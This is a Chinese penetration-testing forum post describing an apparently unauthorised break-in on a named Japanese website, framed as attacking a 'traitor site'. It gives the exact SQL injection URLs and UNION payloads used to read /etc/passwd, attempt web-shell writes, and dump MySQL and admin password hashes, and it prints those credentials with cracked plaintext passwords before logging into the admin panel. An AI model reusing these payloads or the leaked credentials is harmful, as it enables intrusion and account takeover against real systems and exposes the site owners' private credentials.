中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
; ?) h5 j2 d: z
' \4 W% Q6 L& v' H, i
0x01. 检测
www.zuaa.jp
收集数据
_% {: _$ q* n
[attach]73[/attach]
! c+ B& H" ^9 y% D
' r3 s; \& n' P/ a% Q
whatweb
8 _7 v6 G+ e! O9 p4 n
[attach]74[/attach]
* R7 ~' V" S U, `! Y
5 ~3 g! T7 }; w: s/ R" s- s5 W
利用NMAP扫描
) P: }+ I7 a b9 b6 t; f8 C, m
[attach]75[/attach]
7 j7 A/ O c, C6 [ `% T$ ]2 V" y- C
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
$ c! Y; m8 I) g/ R8 |# D1 c( V
0x02.找注入点
2 o4 `. Z4 v5 M, p4 ?& C5 c
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
6 k5 t! M5 F; M' ?; k8 {
[attach]76[/attach]
. e5 n% Q+ T) [+ u1 S& `+ `& ^
( S3 X# X. Q0 E) V4 \ a
0x03.order by
" c8 G( g9 P& F5 C$ r* H
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
7 w5 j: J1 f6 t/ q9 Y, R0 p- b
[attach]77[/attach]
7 ^+ n5 }8 x$ X8 @$ F7 e3 W- P- K
order by 28报错,order by 27正常
7 T8 e4 H! X! o
! U; y4 @. ~. Y; r
0x04. union手动查询
" n i5 O/ V; ?0 a9 o0 ^! c' W
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
/ B* f3 o) x5 k
添加到 27 时正常显示
; M5 b. U o% u A& y. T
[attach]78[/attach]
7 ` [ I/ I2 E- L; _. f6 X2 x
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
# p, `( V0 X) d1 G( u+ J
8 Z4 s& b! I# O' G( Z
0x05. info:
5 }; @3 f7 X* y* S
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
* P& i4 o( {" J9 ?; _8 s
[attach]79[/attach]
" U7 v& c+ c6 I0 ^, Q7 B) }( {
user: root@localhost
; u( k: N1 C' ]& `0 h y9 M2 N' Y4 l
database: openpne
5 o( ?* U5 ]( m: O* I. |
version: 4.1.22
( s3 r% L, @0 S0 U( \& [
os: portbld-freebsd5.4
( v7 [$ Z4 n3 N* n& C
" d3 G7 b8 ` ?- T/ P
0x06. root用户
" Y" t" y# T& f: T) Y
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
4 W; [6 W: s: Y
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
- u) v/ ~; T# Y" |$ D1 t# k4 {
[attach]80[/attach]
7 k3 P+ G7 T5 Q* X& v
通过工具转换
7 }5 q8 D8 X' A5 f( f4 H
[attach]81[/attach]
, w8 J8 T9 [7 u, C/ [
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
/ g: g' X/ P! s, r( K- K
( `$ _8 J6 v8 M
0x07. 利用 into outfile
) w9 y* {8 M+ G! o. a6 x3 O! s6 S
全部都失败
, z, \7 P, A* O' ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
2 X9 q( ^4 |5 s8 j- e3 n7 S2 p
& Q5 w5 L, a7 k5 B4 s9 u- h
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
/ t P9 C6 X: y
/ ?, Z4 n v, m) h
页面显示“MDB2 Error:syntax error”
1 Z: i# [ g. i: T2 k. l) E7 \
C! W! w; Z" Q
0x08. 利用 mysql 4.1
0 ?& T/ ~/ n5 ?7 _, b$ B! W
猜常规表名,字段未果 工具 sqlmap
) G4 u9 E1 {- Z; O6 h$ \+ K0 a* B
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
' n* b8 N9 v$ k) N5 b- I
" v2 Z, S3 {! l4 z' Q9 u5 ^, K
[attach]82[/attach]
. n) @$ k6 m9 ~% X8 R
g/ a+ ^5 L+ q8 J$ _0 \
0x09. 查找后台
; J$ O9 A% G1 f) J# _2 ]9 F
利用 现有的各种 后台工具尝试都不行
' V& h/ z% H% ~7 q; e( \
$ B! q! \' y/ a, e# ] j, S
0x10. MySL外联方法
, M" J5 J( t+ b* O4 H$ y9 V, |9 }
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
8 [9 |7 }$ I% D1 C
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
5 b) a8 g- l/ h& K0 Z9 ?
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
- p8 V1 }6 r4 S: Z) _8 B
[attach]83[/attach]
) Q9 n; R1 Q: e% ]+ B
这个可以在
www.cmd5.com
解密
2 U* d+ k& F- R( `; F- b8 d h. X
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
9 u: o" l7 U E+ ?
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
! n ~' h `: D) B7 W$ E& ?
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
5 n4 ^0 F$ w2 _# N. a
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
: m% @% n9 |# I/ o! N
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
" U% D/ Q. E) S; h0 s( d
[attach]84[/attach]
6 L6 E* x5 S3 i" ~* w2 d
" b9 \; A/ O9 N0 g/ @6 Y2 O
0x11. 网站突破
* r: y' Y* z, q; {, X
发现网站的源程序 openpne, google 下载 openpne 源码
5 d+ \& p4 i3 G8 O$ F7 v$ Q8 d& M
[attach]85[/attach]
# F# V9 [3 W6 e' M' T9 G1 O+ S
# d; Y( G# d5 W! L1 x6 {
0x12. 默认信息利用
! H2 g5 b9 r5 @: Z- I
http://sns.zuaa.jp/?m=admin&a=page_login
" A2 k1 |, ?8 h- |) [$ h# l2 l
[attach]86[/attach]
1 U; D# r5 x" B$ E
表名 (c_admin_user) ,字段名(username,password)
_. B+ Q8 i+ \9 A& e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
5 i9 q9 R- P I: ^
[attach]87[/attach]
R: X3 S% X+ n, O
解密
/ J9 E* e; P. o. |1 |( b8 ]& k
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
# h+ @0 m9 u: V
zuaajp:c0923ec5857796a393da99905008c176, zju1897
" X, g- ]& o* Q6 C. z2 y! P- _
; @2 g. h6 x% A4 N4 x7 R
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
+ l# f- U; x" N+ L0 Y
. U2 W# m8 T$ w8 s
0x13. 登录后台
) u) K2 n" p2 v8 A
[attach]88[/attach]
, X7 A6 D( w! o" D
/ m, a& n& ]) V5 j' o
7 K2 N- {5 ` n! s2 s6 j( C
0x14. 小结
+ d( M5 B8 l/ p C- x1 F' K
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
1 ^0 L& E. a) B& K4 Z8 v
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
; ~: r8 x9 Q. e% a" m$ A
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
: l2 f7 i- t; \
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
; R& i- ~- w) y9 a, u
7 k1 ]1 v3 }" j/ u" c
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
) z7 _$ h' O1 n' k; s; t) Z ]! b
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2